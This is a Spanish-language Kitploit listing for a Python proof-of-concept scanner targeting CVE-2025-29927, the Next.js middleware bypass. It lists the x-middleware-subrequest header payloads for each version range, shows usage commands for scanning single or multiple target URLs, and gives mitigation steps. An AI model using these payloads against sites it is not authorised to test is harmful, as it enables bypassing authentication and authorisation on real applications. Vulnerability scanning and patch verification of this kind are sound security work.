Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
poc-nextjs-CVE-2025-29927 — Escáner automatizado de PoC para la vulnerabilidad de omisión de middleware de Next.js CVE-2025-29927. Prueba múltiples payloads de x-middleware-subrequest a través de URLs objetivo con escaneo concurrente y exportación JSON. | Kitploit
Herramientas/GitHubGitHub/ticofookfook/poc-nextjs-cve-2025-29927
Escáneres de VulnerabilidadesGeneración de PayloadsExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubticofookfook/poc-nextjs-cve-2025-29927

poc-nextjs-CVE-2025-29927

Escáner automatizado de PoC para la vulnerabilidad de omisión de middleware de Next.js CVE-2025-29927. Prueba múltiples payloads de x-middleware-subrequest a través de URLs objetivo con escaneo concurrente y exportación JSON.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 1 añoAún no revisado

Escáner de Vulnerabilidad Middleware Subrequest de Next.js

Una herramienta robusta de prueba de concepto (PoC) para detectar la vulnerabilidad de middleware de Next.js (CVE-2025-29927).

Visión General

Esta herramienta prueba una vulnerabilidad crítica en aplicaciones Next.js donde la cabecera x-middleware-subrequest puede usarse para eludir verificaciones de seguridad implementadas en el middleware. El exploit consiste en enviar solicitudes HTTP con cabeceras maliciosas específicas, que varían según la versión de Next.js.

Cómo Funciona el Exploit

Según la investigación, existen diferentes payloads para diferentes versiones de Next.js:

  1. Versiones anteriores a la 12.2:

    root@kitploit:~
    x-middleware-subrequest: pages/_middleware
    
  2. Versiones a partir de la 12.2:

    root@kitploit:~
    x-middleware-subrequest: middleware
    

    o

    root@kitploit:~
    x-middleware-subrequest: src/middleware
    

    (si la aplicación usa el directorio src)

  3. Versiones más recientes (como 15.x):

    root@kitploit:~
    x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
    

    o

    root@kitploit:~
    x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware
    

Nuestra PoC prueba todos estos payloads automáticamente e informa cuál tuvo éxito.

Funcionalidades

  • Prueba de uno o múltiples objetivos
  • Escaneo concurrente con multithreading
  • Rutas de solicitud personalizables
  • Prueba automática de todos los payloads posibles
  • Salida detallada y coloreada en la terminal
  • Exportación de resultados en JSON
  • Manejo robusto de errores
  • Detección integral de vulnerabilidades

Requisitos

  • Python 3.7+
  • Paquetes necesarios:
    • requests
    • colorama

Instalación

root@kitploit:~
# Clone el repositorio o descargue los archivos
# Navegue hasta el directorio
cd poc-nextjs-2025

# Instale los paquetes necesarios
pip install -r requirements.txt

Uso

root@kitploit:~
python main.py -u https://ejemplo.com   # Probar una sola URL
python main.py -f objetivos.txt         # Probar múltiples URLs desde un archivo

Argumentos de Línea de Comandos

Ejemplos

root@kitploit:~
# Escaneo básico de un solo objetivo
python main.py -u https://ejemplo.com

# Escanear múltiples objetivos con rutas personalizadas
python main.py -f objetivos.txt -p /api/users,/admin,/dashboard

# Escanear con mayor concurrencia y tiempo de espera más largo
python main.py -u https://ejemplo.com -t 10 --timeout 15

# Guardar resultados en un archivo JSON
python main.py -u https://ejemplo.com -o resultados_scan.json

Metodología de Detección

El escáner funciona mediante:

  1. Envío de una solicitud normal al objetivo
  2. Envío de solicitudes con diferentes variaciones de la cabecera x-middleware-subrequest según las versiones de Next.js
  3. Comparación de las respuestas para identificar indicadores de vulnerabilidad:
    • Solicitud normal bloqueada (4xx/5xx) pero solicitud de exploit permitida (2xx)
    • Diferencia significativa en el contenido de la respuesta
    • Indicadores de bypass de autenticación/autorización

Mitigación

Si descubre aplicaciones vulnerables, aplique estas mitigaciones:

  • Actualice a las versiones 14.2.25 o 15.2.3 o posteriores de Next.js
  • Implemente un middleware que bloquee solicitudes con la cabecera x-middleware-subrequest
root@kitploit:~
export function middleware(request: NextRequest) {
  if (request.headers.has('x-middleware-subrequest')) {
    return new Response('Unauthorized', { status: 401 });
  }
  return NextResponse.next();
}
Descargar herramienta
OpciónDescripción
-u, --url URLURL objetivo para escanear
-f, --file ARCHIVOArchivo que contiene múltiples URLs para escanear (una por línea)
-p, --paths RUTASLista separada por comas de rutas a probar (por defecto: rutas comunes)
-t, --threads NNúmero de hilos concurrentes (por defecto: 5)
-o, --output ARCHIVOGuardar resultados en un archivo JSON
--timeout NTiempo de espera de la solicitud en segundos (por defecto: 10)